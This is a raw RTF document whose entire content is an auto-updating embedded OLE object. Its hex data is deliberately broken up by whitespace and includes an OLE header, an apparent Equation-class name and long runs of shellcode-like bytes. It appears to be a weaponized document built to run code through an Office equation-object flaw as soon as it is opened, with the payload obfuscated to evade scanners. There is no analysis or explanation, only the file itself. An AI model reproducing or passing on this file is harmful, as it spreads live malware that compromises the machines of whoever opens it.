{\rtf{\object\objhtml\objupdate\objw1718\objh8705{\*\objdata 9	501	80300	20000
0
00
c 0
000 0
06f
784
a 6367	5a	5
132316	b3800000	00000000	0
0
000 00
1	0 000
0d0cf11e0a 1 b11a	e1	0 00 0 000 00000	0
00 0	0000
000	0
000	0
0
0
003e	000300feff090
00	60
0	0	000000	000000 00000 0	0
010 000000	1	0000	00000
00 00
00010	00000200
0
00	0	0
1
000000f	e
f	fffff 0	0
000	00
000	000	000	fff
ff	f	fff
fff	fffffff	fff	ffff	ff	fffff
f	ff	ff f
fff
ff fff f	ff	fffff ffffffff ffffff
ff
f
fff ffff ff
f
f
ff
f
ffff	fff
f
ffffffffff
f
fff
f	f	fffff	f	f	f fffffff ff ff	ff	f	ff ff f	ff	f	f	f fff
f
f
ff
fffff fff	f
fff
ff	f	ffff	fff f f	f f	f
fff ff
f fffffff	ff	ffff ffff	ffffff
f
f
f
ff
f	fff	f	f	ffffffff	fff
ffff ffff
ff
f f	fff
fffff	f	ff f ffff fff	fffffffffffffffff	ffff
fffff	f	f
fffff	fffffff	ff
fffff
f	fff
fff
ffff
f	f	ff ff fff
ffff f	f
f	f fff	fff ff
fff ff
f	f	f fffff fffffffff fffff f f	f	f
f	ff	ffff	f
ff	fff f f	ffffffff	ffff
f
f ffffff
f
ffff
ffff
f ffff	fff
f	fffff	ff	fff	f
f	fff ffffff fff fffffff f ff
ffffffff
ffff ffff
f f	fffffff
f f ffff
ff fff
f	fff	f	fff	ff
f	f
fffff
f
ff	fffffffffffffffffffff	fff ffff
f	ff ff
f	f
f f f fff f
f	ff	ffffffffff
f
f	ffff	f	ff ff
f
f
f	f
f
ffffffff	ff ff
f f
ffff
ff
ff	f	f ff	ff f
fff
ffff fff ff
fffffff	ff
fff	ff ff
ffff	f
f
ffffff
f	f	f
fffff	ff
f fff	f f fff
ff	f	fffff	ff
fff
ff	ff	f f f f f ff ffffff
ffff ffff
fffffff fff
f
f	ff	f f
ffffffff
f f
f f
f f ff
fff
ffff
f
ffffff ff	fffffffff ff	fff	ffffff ffff	f ffffff
f	fffffffff
ffff	ff	ff	fff	f
ffffffffff	ffff ff
ff ffffffff	f
f ff
ffff
fffffff fff f f
ff ffffdffffff
fef f
ffff	f
ef	f
fff f	0
4	00
0	000
05	00	0000 0
6	0000 00fef
f fff	ff	ff	ff fffffffffff	f	f	fff
ff
f	fff	f	ff
fff f f f
fff f
ffff ff
ff ff
f f
f
fff f
ff	f f
f f
f
f ffff f
f
f	ff	ff
ff	f	f	ff
ff	f	ff f
f ff f f
f
f f	f	fff
f f ff ff
f
ff f	fffffffffff	fff	ffff	ff
f
ff	fff fff
f	ff	f	ff	ffff
fff
ffffffffff fffff
ff
f ff	ff
ff	ff	ff	ffff f
fff
ff f
f ff fff ff ff
f	f	f fff	ff	ff ffff	ff
ffff	fffff ffff	fff
f	fff
fff
ffff
ffffff	ff ffff	f	f	fff	fffff ff f ffff ffff f fffffffff ff f fffffffffff ff ff	fff	fff	ffff	ffff
fffff	ff	fffff fffffff	f	fff
ff
f fff
f	f	f ff
ff
fff f
ff
fffff ff
f f
fff ff f fff	ffff f
fff fff f f ffff f
fff
fff	f	f
ff f ffff fff fffffff fff f
f	f	f	ffffff
ffffff
ff	fffffff	fffffffffff ff
f ff ff fff ff
fff
f
fffff f fffff f	fff
ffffff ff	ffff	f	fffffff	ff	ff
ffff fff	ff
fffffff	f f f
f f f
ff
f
fff ff f
f
ff	ff
f
fff	f
ff fff	f
f	ff f fff fffff
f	f
ff
f
ff
ffffffffff fffffff ff
ff
f f
f ff ff	f
ff
f
ff	f	ff fff ff
f ff ffff	f f fffff fffff fffff	ffffff
f
fff	f	ffffff	f
f	f	ff
f	fffff
ff	ff	fff
ffffffff
ffff
fff
ff	ff fffffff	ffff	ff	fff	ffff
ff
ffffff	fff
f
fff	fff	f fffffffffffffff
ff	f
ff
fff	f
fffff	f	ff ff
f	f f ffffff f	ffff
f fffffff	ff f fff ff	ff
f fffff	fffffffff
f	ffffffff	fffff
ff	f f
f f f fffff f fffffffffffffff	fffff ff f	fff
f	fff ffff f	ff	fffffffffff
f	fffffff
fffff	f	f ff
ffffff f
ff
f ff f	f	fff	f
f
f
f	f
ffffffffff	fffffffffff
f
f ffffff	fff	5 2
006 f006 f00
7	4
0	020 0	0	450	06e0
0740
0 7	20079
00 0
00000000	0	0000 000000000	00000 0 0 0
00 0
0
0
000000	000	000000 000	0	000 00
0 0	0	0000000	00 00
0
00	0000	0	0
000001	600	050
0f	f
fff	f
ff	ffffff
ff010 0
000
002
ce02 0000 0 00 00	0c
0000000000000 46000 00 0	00 00000 000 0000 0	0
00e	0 17	0	60e0
17	7d4	0 10 3000 0004	007 0
00 0
00
00
0000 45005 1 005 5 00 61 007
4
0049 0 04f 0 06
e0 02
0
0
0
4e006100
7 400	69
00	56	0	04	5
0
00
0
00
0	0	0
0 0 00	0
00
0
0	000	0
0
0	000 0 0	0
000000
00 0000000 0	000000
00 0 0	00
000
0	00000	0 00200002
0	1fff
fffffffff ffffff
f	ff	f f
f 00000	0	0000 00
0
00000	0	0 0
000	0
0	0 0000 000
00 00
00000	00000 00000 00	000	00
0	0
0	0000
0
0
000000	0000	01	8	070	00	00000000000000000	000000	0	00	0000 000000000 0 000	00 0 00 00000
000000
00 000 000 0
000	00000	000
0	00
0	0
00
00
0 00
00 000	0000 000	0	000
0
00
00
0
000	0	00 00 0000 000000 000000000
00000 f
f f	fffffff	f	fff
f f
ff f
ff
f	ff000	0	00
000000000000
00000	000
000	0
0 0000
0	0000	0
000	000	000 00000000	00	0	00 0 00 0 0	0 00
00	000	000
00
000 00	00
0	0
00000
0 000 0 0
000 0 0000
0000
000
000	0
0
00 0000 0
00	0	0
000000 00 00
0
000
0	00
0	0	0	0	00 000 00 00 0000000
0
0	0 000	0	00	0
0	0	000
0
0
000	00000 000
0 00	0000	000	00000 00 000 00
0000 000	000
00
0ffffff	ff	ff	f
f
fffffff
f	ffff0
00 0
0
000 00 000
0	00000000
00	0	0
0	0
0000000	000	00000 00 0000000 000000 000
000
0	00
0	0
0000	0	0000000 0 00 00 00000 00 0000
1 0	00
0
0
00
20000000	30 0000 0 0	400000	00	50 00 0 0
0 0 6000 0
0 0
0
700
00000
8	0	0	00000	9	00	000	0 0
a	0
000 000b0	0
00 0	0	0c	00 000
00d000000	0e 00	00000f	00
0 00	010	00000	01	100
000	0	1	200
00 00	1	300
000	0 14
000
00 0 150000001
6
00 0	00	0170	000
00
1800000	019000
0001	a	00 00	0 01 b 0000	0	01c0 0
0 000fef	fffffff ffffffffff f f	ff ffffff f	f ffffff f
fff	f
f
f	f	ffff	ff
f fffff f f ffffff fff fffffff	ffffffff	fff	ff fffffff f	fff ff fff ff fff
f fff fffffff ff	f f	f
ff	fffff	fffffffff ff f f ffff ff	fffff
f
ff
fff	f
ffff ffff fff
ff
fff fff ff ff	ffff	f	f f	f	ff	ffff
f f	ff	f	f	fffffff f ff
f	fff
fffff
ffffffffffffff f
fff ff	f
f	ffff
fffff	fffffffff	f
f
f	fff fffffff	f
ff
f
ff
ffff	ff	ff
ff	fffff	ffff	ffffff	fff
f	f ff ffff ff f	ff	ff f f	ff f
f	f
ff fff	fffffff ffffffff	ffff	f	f	fff
ff
f
ff	f	ff
f
f
fffff	ff
fff	fff fff
ff
fff ffff fffffffff f fffffff
f
ff	ff	ff ff f f	ffff f fff
f
ffffffff
ff	f ff
ff f f f fffffff
ff
ff f f	f
f	f
ff
ff fff ff	f	ffffff	f
ffff	f	ff fff	fff ff ff	fff f ffffff fff
ffff
ff
f
fffff
f f
f ffffffff	fff ffff f f
fff
f ff
ffff f ffff fffff ffffffffffff
ff
f	f ff
ff	f
f fff
f
f ff	ff
ffff fff	f
ff
fff
ff	f	ff
ff	ffff
f	ff f f	fff
ff f fff
fffffffff	f	ffff
ff
ff
f	ff
fff	ffffffffff	ff	ff f ff
f	fff
f
ffffffff
ff
ffff	f
fffff fff
f	ffffff	f ffff f	ff	fff fffff f
fff f ff fffff
fffff
f
ffffff fffff ff f fff
ff f
f
ff	f	ff f fffff
fff	f	ffffff f	ff	ffff	f
ff	1c0	089 c 7	0	0
006	fb86bb1 ee04
97b3590a	0e
d
95	9
3b	ce	8 45418	8	c58	b93102a	189 6 6
b198	01081
2c1 bad88b4b66
8
1f2e4
3
6
0e6 6
8b 3
a
8b	1f
b e	503
b	2c9581c6602c
1a6b8b0 e53ff d1054a99fd9e
0	5
b	8	670261f	f	e039 a62441 0
0 0d64 bd7	41	a3f72
ba 6 d
0	efc
1cfca	1cb	8
c6d	27 9 c5
45c
9 0
0b 26a 4	d	28c
9a	1c4edfad 64 f 9b9d7a
0b	dba
5 766
52 5aa37c5a	e952724c	d4c3 180
d41e	d2
846350d	8b4	65da34	214
30	0be8eb69e 98 05 935f bb5	1dfe531	8a	79e1b 4f b6928
3
b
3fa5	43f8	4b
f	efee0105
9	c	b	9a
4	0cc67 2d0b3 709 f
2	6b d46 a e4	9 a
cd
84	4	e9
164b43	a	f6	e68a	8 f99
89	4	4a2
0 eb	4
4
8 d
e 7
ea2	4298f4	e	a	bff	ada0
8	1bb9a2b
a79
e af4839c02 075bb	31be
bd4e	2046bfa	b 1a	316 e
537618
de4
f84
1
2
c 1	f 37fbe42f3f9c
c75
3
5
c
138	ae543	e0	43	6
a2
17b 5c
d
1e
e
d	e190	a8fc e 9 800100 0
066c39ae c4	3	96	176d
8d 64
01cc 7 ed471c	2188	6e
21d	6
4	497304
ab 622 a2bbd cd3021 29	7	70	f8 18 67df83
fb0	7
90
1e
50
4
b
3	6	0
c da 367b 265 b
70 637 7 1a87
71547	6
3	53
931	69c
2
65
c1
909b2c
2e 6a4	2ef
7a
3eb7	e574
c2
086
9c
f	08	b5 1
2 6f2b 46a	3	94	9ab	063ec
04 25303384eb 5f	3e3e8f
e	6988b3
b7d
8c2
0
e
611
f41
60a
bb d08
52b
917 a
f 1	365	b4
9f	9 87	d815a d30410
b 30	06 a d31
0
ddd d
62a	cec7abad7b5	90
7
d33	0	0e42df9	1	d	f	272	3
41
e	255 904
191f93
d96 6f	6
b	4b	ce7	70	7	48
b3b
4
ff0320
c81
e	6	f 44 06
df b
aa 48	2	b
fa
fe	57
c90ab1
a08	8
01d4	9	f1c901053f091d	e7 d613 d d0 e30	177	c992d 404 3e14
91
ca7 d	bf
e b1 6e2e7be	d	7	23	2760e4869f dd	352 72e3224
36b
c8db2	3	373
9
6c	43	90
2	a 6
6 23
0d9
09f91a7
14 0
9 84982	433	2a34db7e2 e5
d0 3e 24e0 1	5a71
7 b
26536
be
189 0e5 459825a
3 35
d6bb 8
f	c0c
22e
40f	9e5daf f1a	99	e3
0	7bd4e	71cd2	3	c6e	9337
15c3f	d4ef36213 c4b9745 2dd1 1	0a adbb8cbc9 3258c0e80e6 e
02 4	b7f 5af 0 7f0c	5 d8 48eede
4894e50b8dd93964 bb5 779	5f	2d69b
d	3	21 dd 5 e
d1 b9 7 a 284
038afa 4	4	30313	ffb6a1
10e9
4
f0	1	0	0	00e9a80100	0081c
5	8500	0000e	90	80	10000e
9
d
9	0	00
0 0
0 eb 1 be9b70
1 0000e 93801
00
00eb1
beb04 7
5
36f695 eb4 9e b0c
e9
c1
00000	0ebf	7e	916
0	1	0000e9
d1 0 000 0069d29
16c
9 f 1a9c5
3508 d
9839 7 70000	8	d
98	0
a4	80
00
0
81c3 cf000 00
0 81c
32
d2
a0	0 00 81c3e d74	0
0
0	0eb085 2 49	4
454d38	e7e d
d5
85 b9	de	b07
e	93f 010
000ebb081c26 d3e 0 5
2 7e984 0 0 000 0e 97a fff
fffe9d200
000 0
eb1ce 923010	0
0	0e
969ffffffeb0 c
e
bf	2 e92
70 10000
e
9b4 0
00	000
eb9	2
eb 61e9 2001 0000eb
1c e
bcfe9d2	0 00000 5debc 7	e	b36e99c
0
0	00	0
0e	b
17 e9	54
fff
fffe	b	34
e
b	eb e	9	d700	000	0e9	a200000	0e
bd	f	e	b4	b3
15 50 0e	b
2be95	5f f fff fe 99e00
00 0 0e
924f	ff
fffeb91eb 99	e9	d7000 000 6 b	d200e	b22ebdc	eb	f7e9	8	4000000e9a90
0
00	0
0e
bc0 e	9	7	0fff	ff
f
e b
378dbd 9 70
2
0	0
0 0e
9a1
000	00	0e
b
b
f
e	9	1
4 f ff	f	ff39
fd9c575281efcc2	c0 0008	1 c2	220b000081c	2
6 b79000081c79569 0000 5a5
f
9
de9 c
8fe ffffe868f f
ffffe9 4 cf f fff
f	e	9
40
ffff
f	fe
b	5aeb11e929fff
f f
f
e	965ff	ffffe b	2 0 e9 5 3f	f	ff
f	fe	98d	f
e	ff
ffe9 6 2f f	f
f
f f	83c
5
04eba8e 90b	ffffff	e989f	e	f
fffeb45e	917f	ff
fff
9c535	65281e
af	163000	0	8 d b3 c3
2a00008
d9e8	8	5c0	0005a5	e5b9de924ff ffffe9
7	dfeffff9	0ebbee 9 f d
f	eff	ffe93dff	f	fffe9	04
fff	ff	f90eb8 de9ebfe f
fff
eb
9b0 f
8	2	6	5fe
f
ff	fec	d	22
9	2	42
a	96ee
5	d370430529	4b02	77 341c99	b2	e
3e
0a1d	1
3	8b7d
5
0 8	b2
8 1
8 f477	1525
6 2	b
3 b
a
16e579df035 1	4
4d	8c3ea a	8	9
b	968	2	c0 31f 59
d2cc34 4 1fb6 d9337	1
a	7	b d5ffa	311f	40cca1	e8
0
c2 9 80
8 02 f77e3 e2 9
cf
711
5 a	1
95	ef752c837bb	780ca62 d1d9ebd 06c6
a4 1b	654
611 f7116
1253062
6 ae192
fdd8a 8e7 e
68
3 f f06 d7c 83c9 50d 0d5c 68	efc	27	0	543
3d7	2 ab8d1347	7f1b6 e 1b1	c ee ed	e 5b	3d0	62
b	5 f
d	99bc8246	e9db	568c	48
3f2
9	2b8757f	a
3
b	1ce5c2555d0 8 97d 498708 f a	201d
8
66395759c	cc73fb	3	29	2729d1
a	6149 5 cc	f	256f2	d8
4 0b4
62a75
181
dc242 02 6
b df2f12c8
90 74 505 80b558e	2 6544 23 4f
e7 d
9b 5dd667 4 4c0b8 80	d9d
76b 4b56	0
0c
3c
9 235138fe4
0
9ee9 e
c a
dd
3e 9 da6a8 0da97
77f2d
dced4b8c b d	981 33c	7	b 57e
6c1
663cb414f96
6828d8	9e55 4bb2c89 2 7	196	b2
1f52	62d
9f
c5	dd89	d2	97 d
a 7 79a	6	0
f
cca773
a73c	5	b908	0e	4
31f
d6ef4d1	6
a256	d	7cc73c04dc	40f
a2 486b
0e3	61	0 98374 d	c1b7	2	6	e12c	1	dd	9d4abd73 595 961 e 272d40
a6f d 01 4dd680
d 067
67978f	6	dc7b	0
caf	c791
03	4 4a
1	e
096
504b4
5
b68
b 7 15d9
5 8	c 3 6
6f5d431b2748e1 22209a 91
6d 3 a46
28
60398
4	e2
1
d	044a2	3	dab
0 f 4 5c1762 03933 ed
a	00
a
344c	f	9
e
5
a	3 1c 9 a84 ae0224
84 5	6d 13 6 1
9ff36 2 3
2
8f2d9
13	c	1	2b
c
104	a376713
a	7983 ec f
1f 8
c
6b f4
2c f13 c	e
5	94
d6
fd	7
9 1ef59d d30 a6
1
f8ce	62b	3148da1
6	af0 8
a
a7 226
c	8acac2
0	c	3 0b3
72 d 3f70	f
6a93e0	50 e7	5 c8
c045b88a c	7
a b
0e
e2	9b00e87
b
a	7883c
b 34b e8f4	ab5	1	3e
3	df55	b	c
c 2a0e0048	0
2c
a	a	110 d0a9a 99c f37
108 ea
4
e	20568	737	66 f	8	0a	7b2e 2f6d60	0	6
dc
5
1	26
7f
7 3df7bb d 0d7	e	4	85b6
e2	d	a34a24	6	fd0	2 3	7c	a36 2210dd50ab1a0	ad7 898724b 17
e2f6d	8 8 7231	67e05 6
12a
9754284	2
152
9af	716
d8	e
b
7
b	d
be	45
39	dbe	3f 4d
81f	e ad	46 43	3	b
492db8 10750
88c4 b 4489 c9 16aaba1	eae4
2
e	a74
bb	0785 3 e1	2
0a	d 99c6 5
f80	00	000000000
00000
0 00000 00000	000 00 00	000	0	00	0	000000000000000000
0	0000	0
000 0000
000000000 00 0 0 0	0000
00000 0000 0 000	0000 0	00
00000000
000
0	00	000
000	0000
000
0
00
0
0
0000
0
00000 0 0
0 0
00 000	00	0	00000
0	0	000 0 0 0 0
00
0
0000 00	00 0000 00 00 00
00 0 0 000000000000000000
0 0 0
00	000	000	000 0
00 0 000 00 0	00	0000
0
00 0000 0 0	00	0000 000 0
000 00000 0	00	0	00	000 0 00
0 00 000 0
00	00	0	0	00 00
000000000	0 000 0 0 00 0 0
0 0 00 0 0
000 000	0	0	0000	0 000 000
00	0	0 0000000	00
000
0
0 00 0 0	00	0	0	00
0	0 0 000	0
00	0
000000000
0000000000000
00
0	0
00
00
0
00
0 0	0
0000
00	0
0 000 000
0 0 00	0
0 00	0 000 0	0	0
0
00
000000c 16 56f6 60000000	0}}}